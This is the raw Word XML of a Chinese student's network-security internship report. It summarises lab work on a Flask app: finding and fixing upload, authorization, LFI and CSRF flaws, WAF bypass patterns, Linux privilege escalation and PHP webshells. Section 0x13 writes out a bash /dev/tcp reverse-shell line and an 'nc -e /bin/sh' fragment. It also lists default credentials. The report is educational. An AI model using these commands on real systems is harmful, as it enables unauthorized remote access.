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学　　号  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>141531000  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4级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指导教师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陈腾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">            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二十七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网络安全实践-2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>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四川大学空天科学与工程学院四楼401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2026年7月18日-7月27日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一、实习目的、要求：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE64F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1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、实习目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205FAF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本次校内综合实训为网络空间安全专业必修实践环节，依托 AI+Web 安全实战模式，旨在让学生掌握 Python Flask 开发与全套安全工具运维能力，吃透十大 Web 漏洞成因、利用与加固方案。通过小组完成用户管理平台项目，熟悉 AI 代码审计、自动化攻防脚本开发，建立标准化工程开发流程。同步锻炼团队协作、项目交付与技术答辩能力，兼顾基础开发与安全攻防双向技能提升，树立 AI 开发安全风险防范意识，贴合企业网络安全岗位实战需求。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7DC12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2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、实习基本要求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BF75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学生需具备基础编程与网络知识，全程以 AI 辅助开发，重点完成漏洞挖掘与加固，分层完成基础任务与高阶拓展内容。严格执行每日日清交付、双重考勤制度，规范 Git 版本管理，完整留存攻防日志与双版本项目代码。独立完成漏洞实操，杜绝抄袭，缺勤超 2 天将取消考核答辩资格。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C9A6759"/>
          <w:p w14:paraId="7A7BA98E">
            <w:pPr>
              <w:rPr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二、实习主要内容</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75249FE6">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实训以 Kali Linux 为基础平台，以 Flask Web 用户管理系统为实训项目，从攻防双视角系统性地开展了以下实训内容：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19172960">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="289B143B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6063D26E">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="708CAC3C">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FB877AD">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42D407AE">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B378443">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BD9E750">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="718BD442">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C5ACCE8">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6273AD88">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AD51EAA">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D061495">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D507424">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72846503">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C241F6C">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70D64B79">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="681A479B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5339FFD1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w14:paraId="7317CE16">
            <w:r/>
          </w:p>
          <w:p w14:paraId="734A2809"/>
          <w:p w14:paraId="7EEEDFD2"/>
          <w:p w14:paraId="2D0D738D"/>
          <w:p w14:paraId="7816B03A"/>
          <w:p w14:paraId="19739044"/>
          <w:p w14:paraId="01724976"/>
          <w:p w14:paraId="1878F5A8"/>
          <w:p w14:paraId="7374F3F0"/>
          <w:p w14:paraId="68BF3595"/>
          <w:p w14:paraId="0A77933D"/>
          <w:p w14:paraId="2858332C">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="5AAFF8AC"/>
          <w:p w14:paraId="2BE3C896"/>
          <w:p w14:paraId="5C92DDC2"/>
          <w:p w14:paraId="09524F52"/>
          <w:p w14:paraId="35B9A939"/>
          <w:p w14:paraId="2E9DBE88"/>
          <w:p w14:paraId="74A3448A"/>
          <w:p w14:paraId="368959DE"/>
          <w:p w14:paraId="4E497DAD"/>
          <w:p w14:paraId="7467427E"/>
          <w:p w14:paraId="386EC426"/>
          <w:p w14:paraId="0C67C0B2"/>
          <w:p w14:paraId="03582CCF"/>
          <w:p w14:paraId="68BBA0E4"/>
          <w:p w14:paraId="011844AA"/>
          <w:p w14:paraId="1B0EEE93"/>
          <w:p w14:paraId="26E33574"/>
          <w:p w14:paraId="75865D05"/>
          <w:p w14:paraId="3EAB8203"/>
          <w:p w14:paraId="54A7929E"/>
          <w:p w14:paraId="3BB095F5"/>
          <w:p w14:paraId="0075BAB0"/>
          <w:p w14:paraId="3F87ADE1"/>
          <w:p w14:paraId="53267691"/>
          <w:p w14:paraId="059F7837"/>
          <w:p w14:paraId="51D379CC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</w:r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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F45A35">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11356797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</w:rPr>
              <w:t>　　　　　　　　　　　　　</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>指导教师签名：　　　　　 　  年　　月　　日</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D3D882">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。了解了 Kali 内置的各类安全工具分类与用途，掌握了软件包管理、用户权限管理、服务管理、网络配置等基础运维操作，为后续实训环节奠定了坚实的系统基础。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，熟悉了 AI Agent 的架构设计和工作原理。通过配置 AI 辅助安全分析的环境，实现了利用大语言模型进行代码审计、漏洞分析、方案设计和报告自动生成的能力。掌握了 AI Agent 的工具调度机制、技能安装与管理、会话管理等核心功能。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，包括 Bot 的注册申请、权限配置、消息路由设置。实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。通过 QQ 通道实现远程操作的能力显著提升了实训效率。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x04 密码安全：系统学习了密码安全相关知识。0x01 常见部署系统默认用户密码：梳理了路由器（admin/admin）、数据库（MySQL root/空密码、PostgreSQL postgres/postgres）、中间件（Tomcat、Nginx）、物联网设备等常见系统的默认账号密码，建立安全意识基线。0x02 用户名密码泄露：分析了密码泄露的常见途径，包括数据库注入、日志文件泄露、社会工程学、撞库攻击、暗网数据买卖等，学习了密码保护策略（密码复杂度要求、定期更换、多因素认证、密码管理器使用）。0x03 TOP7 CVE-2026-40910 frp 漏洞：分析 frp 内网穿透工具的最新高危漏洞及利用方式。0x04 Burp Suite 安装：Kali 下完成完整安装配置（JDK 环境、社区版/专业版对比、BApp Store 插件）。0x05 代理设置：配置监听 127.0.0.1:8080，导入 CA 证书实现 HTTPS 流量解密。0x06 BP 字典攻击：Intruder 模块搭配 Kali wordlists 字典库进行爆破攻击，Payload 设置与结果分析筛选。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x05 文件上传实验：发现存在路径穿越漏洞（通过 ../../ 上传到任意目录）和 Content-Type 绕过漏洞两类严重安全问题。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数（Magic Number）校验读取文件头部字节验证真实文件类型（如 PNG 的 89 50 4E 47、JPEG 的 FF D8、GIF 的 47 49 46 38）、限制上传文件大小 2MB、设置上传目录不可执行权限。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x06 越权：发现垂直越权（未登录用户可直接访问需认证页面）和水平越权（修改 user_id 参数可查看他人信息）两类漏洞。修复方案：新增 login_required 装饰器统一认证管理，覆盖所有需登录的路由；在敏感接口校验当前用户仅能操作自己的数据。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x07 WAF 绕过：以 SQLi-LABS 靶场开展 Fuzz 测试，掌握了注释符绕过（/**/）、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL/Unicode/Hex）、HTTP 参数污染（HPP）等多种绕过技巧。通过 Fuzz 测试深入理解了 WAF 检测规则的工作原理与绕过思路。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x08 文件包含：/page 路由存在本地文件包含漏洞，可读取 /etc/passwd 等系统文件，结合文件上传可实现远程代码执行。修复方案：使用 os.path.normpath + os.path.realpath 双重路径校验，确保路径在 pages/ 目录前缀下；同时对内容做 HTML 转义防止 XSS。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x09 CSRF 漏洞：所有需认证的 POST 操作（改密、充值、上传等）均未携带 CSRF Token，攻击者可构造恶意页面诱导用户执行非预期操作。修复方案：使用 Flask-WTF CSRFProtect 中间件全局启用 CSRF 保护，所有表单添加隐藏的 csrf_token 字段。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x10 NPS 客户端配置：掌握了 NPS（内网穿透工具）的客户端配置方法。包括 NPS 架构原理（服务端+客户端模式）、端口绑定、认证密钥设置、客户端 VKEY 验证、隧道协议选择（TCP/UDP/HTTP/SOCKS5 各协议适用场景）、多隧道管理、状态监控等。通过配置 NPS 隧道实现了外网访问内网服务的穿透能力。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x11 Linux 常见利用手法：学习了系统层面的渗透测试技术。SUID 提权（find / -perm -4000 查找利用）、计划任务利用（检查 crontab 插入恶意命令）、sudo 配置错误（sudo -l 查看权限利用不当配置提权）、内核漏洞提权（Dirty Pipe、PwnKit 等常见漏洞）。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x12 PHP 反弹 Shell 木马使用：编写了 PHP 一句话木马（eval/assert/preg_replace 型），结合反向 Shell 实现 WebShell 管理。掌握了大马与小马的区别、WebShell 管理工具（蚁剑、冰蝎、哥斯拉）的配置与流量特征分析。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x13 Shell 反弹手法：掌握了多种反向 Shell 的构造方式：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh）、Python 反弹（socket+dup2+subprocess 三步法）、PHP 反弹（fsockopen+exec）。学习了正向连接与反向连接的应用场景及防火墙穿透原理。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p/>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、默认密码梳理、密码泄露分析、frp 漏洞分析共六项）、0x05 文件上传漏洞（含路径穿越和 Content-Type 绕过）、0x06 越权漏洞（含垂直越权和水平越权）、0x07 WAF 绕过（含注释符/大小写/双写/编码/HPP 等多种绕过技术）、0x08 文件包含漏洞（含路径穿越和与 XSS 的组合防御）、0x09 CSRF 漏洞（含 Token 机制的原理与实践）、0x10 NPS 内网穿透（含隧道配置与多协议选择）、0x11 Linux 利用手法（含 SUID 提权、计划任务、sudo 配置错误、内核漏洞）、0x12 PHP 反弹木马（含一句话木马变体和 WebShell 管理工具）、0x13 Shell 反弹手法（含 bash/nc/Python/PHP 多种实现方式）共 20 余个细分知识点，做到了理论与实践的紧密结合。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进。项目覆盖用户注册登录、个人资料管理、头像上传、URL 抓取、搜索、页面管理、Ping 网络诊断等完整功能链，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞。修复过程严格遵循安全开发规范，每一处修复都经过漏洞原理分析、攻击载荷验证、修复方案设计、代码实现、回归测试的完整闭环，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。通过这些实操，我深刻体会到一个功能正常的 Web 应用在安全层面可能存在的巨大隐患，也建立了【所有用户输入不可信】的安全编码思维。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能。Kali Linux 作为渗透测试基础平台，其内置的各类安全工具覆盖了从信息收集到漏洞利用的完整流程。Burp Suite 的熟练使用是本次实训的重要收获之一，从代理配置、安装 CA 证书到 HTTPS 流量解密，从请求拦截修改到 Intruder 模块的字典攻击全流程操作均已掌握。通过 Intruder 的四种攻击模式（Sniper、Battering Ram、Pitchfork、Cluster Bomb）的对比实践，深入理解了不同场景下的最优攻击策略选择。OpenClaw AI Agent 的使用让我体验了 AI 辅助安全工作的新范式，Git 版本管理则让我养成了规范的代码管理习惯。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法，理解了正向代理与反向代理的区别及不同隧道协议（TCP/UDP/HTTP/SOCKS5）的适用场景。通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误利用、内核漏洞提权等系统层面攻击技术，建立了 Linux 系统安全加固的全面认识。通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能。这些进阶内容让我对网络安全的认知从单一的 Web 应用层面拓展到了系统层和网络层，形成了更为立体的安全知识架构。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实训最大的收获是安全思维的建立与实践。从 SQL 注入使用参数化查询即可修复，到 SSTI 需要深入理解模板引擎原理才能防御，再到命令注入需要三层防御策略构建纵深防御——每一个漏洞的修复都让我更深刻理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。安全设计需要在需求阶段就开始考虑，安全编码需要融入每一行代码，安全测试需要覆盖所有输入输出路径。从攻击者视角理解漏洞利用手段，从防御者视角设计多层次修复方案——这种双向安全思维将伴随我未来的技术成长，是本次实训最重要的收获。</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>感谢实训指导教师陈腾老师的指导以及 AI 辅助工具的支持。本次实训让我从一个对 Web 安全仅有模糊概念的学生，成长为能够独立完成漏洞发现、分析、修复及报告撰写的准安全从业者。未来我将继续深入学习容器安全、移动安全、DevSecOps 等进阶方向，不断提升专业能力。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E2D82DF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253AB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83921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11840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C9C0D32"/>
    <w:rsid w:val="241B61B5"/>
    <w:rsid w:val="2D053838"/>
    <w:rsid w:val="2E2E327E"/>
    <w:rsid w:val="4B47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160</Words>
  <Characters>190</Characters>
  <Lines>17</Lines>
  <Paragraphs>17</Paragraphs>
  <TotalTime>226</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>465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Tora</cp:lastModifiedBy>
  <cp:lastPrinted>2021-06-21T07:21:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-27T06:11:43Z</dcterms:modified>
  <dc:title>附件４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eyJoZGlkIjoiMjMyM2FlNWZkYTM5YmNlZWYzMDgyNmRjYTdlODhiNDIiLCJ1c2VySWQiOiIyMjcxNjYwMDUifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>97D0834B8F92478FB5E56F1EB7C70F13_13</vt:lpwstr>
  </property>
</Properties>
</file>